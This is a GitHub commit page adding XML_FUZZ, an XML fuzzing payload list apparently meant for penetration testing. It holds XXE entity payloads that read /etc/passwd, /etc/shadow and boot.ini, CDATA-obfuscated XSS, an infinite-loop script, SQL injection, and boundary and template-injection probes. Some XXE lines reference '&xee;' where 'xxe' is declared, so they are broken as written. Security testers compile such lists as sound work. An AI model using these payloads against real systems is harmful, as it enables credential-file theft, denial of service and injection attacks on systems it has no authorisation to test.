Skip to content

Commit

Permalink
Create XML_FUZZ
Browse files Browse the repository at this point in the history
  • Loading branch information
@jhaddix
jhaddix committed Jul 28, 2014
1 parent 6fae683 commit 73c85e7
Showing 1 changed file with 50 additions and 0 deletions.
50 changes: 50 additions & 0 deletions Fuzzing/XML_FUZZ
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,50 @@
## After XML Declaration

<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo>
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:/boot.ini">
]>
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc/passwd">
]>


## Element and Attrib Values

null
*
%
@
$
-
+
;
:
0
-1
1
0.1
0.9
true
false
1.7976931348623157e+308
5e-324
0.00005
5e-10
&apos;XoiZR
&quot;XoiZR
&lt;Tnn96&gt;
&lt;?Tnn96 ?&gt;
&lt;? Tnn96 ?&gt;
&lt;% Tnn96 %&gt;
&lt;%= Tnn96 %&gt;
[Tnn96]
(Tnn96)
{Tnn96}
{{Tnn96}}
{= Tnn96}
{{= Tnn96}}

0 comments on commit 73c85e7

Please sign in to comment.